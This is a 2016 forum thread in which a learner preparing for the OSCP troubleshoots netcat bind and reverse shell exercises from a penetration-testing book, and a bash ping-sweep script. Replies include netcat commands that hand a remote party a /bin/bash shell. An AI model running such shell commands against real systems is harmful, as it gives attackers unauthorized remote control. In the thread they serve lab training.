OSCP help - Netcat

McxRisley · May 2016

Hey guys! I am currently doing some prep study before I sign up for the OSCP and I was wondering if any of you would be able to help me with some issues I am having with Netcat. I am reading and doing the labs in Georgia Weidmans Penetration Testing book and I am unable to get the reverse shell code to work with Netcat. I know that Kali now comes with the OpenBSD version of Netcat which does not have the -e command. So I downloaded the old GNU 0.7.1 version that has the required command. The book calls for the following commands to entered into the shell.

In the first terminal enter:
root@kali:~# nc -lvp 1234 -e /bin/bash

In the second terminal enter:
root@kali:~# nc 192.168.20.9 1234

When I enter the second command into the second terminal it gives me the following message:
/bin/bash/ not found: connection reset by peer

and then it closes the connection. Any help or advice on this would be GREATLY appreciated since I have been unable to find any articles or anything about how to fix this issue anywhere.

BlackBeret · May 2016

I would start by adding -v to the second command, this will increase the verbosity and may give you more to the error message. I'm not on my kali machine at the moment so I can't test this one, but try running '/bin/bash' locally and see if it runs a shell, also try '/bin/sh' to see if your default shell is something else.

ilikeshells · May 2016

You are doing a bind shell, not a reverse shell. Have you tried:

#1: nc -nlvp 5555 # listen for incoming shell
#2: nc -nv x.x.x.x 5555 -e /bin/bash # send shell.

McxRisley · May 2016

UPDATE: After doing some research I went home and entered '/bin/sh/' instead of '/bin/bash/' and it worked both ways. My next question is, is 'sh' the same as 'bash'? Also I am now having another issue with a bash script that runs a ping sweep on my local network. The script is:
#!/bin/bash
if [ "$1" == "" ]
then
echo "Usage: ./pingscript.sh [network]"
echo "example: ./pingscript.sh 192.168.20"
else
for x in `seq 1 254`; do
ping -c 1 $1.$x
done
fi

The script returns:
unknown host 192.168.0.seq

I really appreciate the help guys. I am a newbie to Linux so sorry if these questions seem kinda dumb haha

BlackBeret · May 2016

/bin/sh is a link that points to your default shell. There are different shell programs on Linux, the default is usually bash, but if since you were having trouble with it there's no harm in pointing to /bin/sh and letting it redirect you to the default.

BlackBeret · May 2016

That script looks and runs fine in bash. I'm wondering if Kali is using something other than bash by default. Different shells will respond differently.

If /bin/sh worked on the previous exercise when /bin/bash didn't type the following in to a command prompt:

ls -alF /bin/sh

Then look at what /bin/sh is pointing to, this will tell you what your default shell is.

McxRisley · May 2016

How would I check for that? I know it has to be something with my script because if I use nmap to perform a ping sweep it works just fine.

kaizen_404 · May 2016

McxRisley wrote: »

UPDATE: After doing some research I went home and entered '/bin/sh/' instead of '/bin/bash/' and it worked both ways. My next question is, is 'sh' the same as 'bash'? Also I am now having another issue with a bash script that runs a ping sweep on my local network. The script is:
#!/bin/bash
if [ "$1" == "" ]
then
echo "Usage: ./pingscript.sh [network]"
echo "example: ./pingscript.sh 192.168.20"
else
for x in `seq 1 254`; do
ping -c 1 $1.$x
done
fi

The script returns:
unknown host 192.168.0.seq

I really appreciate the help guys. I am a newbie to Linux so sorry if these questions seem kinda dumb haha

There's a slight error in the script. Try this: for x in $(seq 1 254); do

OSCP help - Netcat

Comments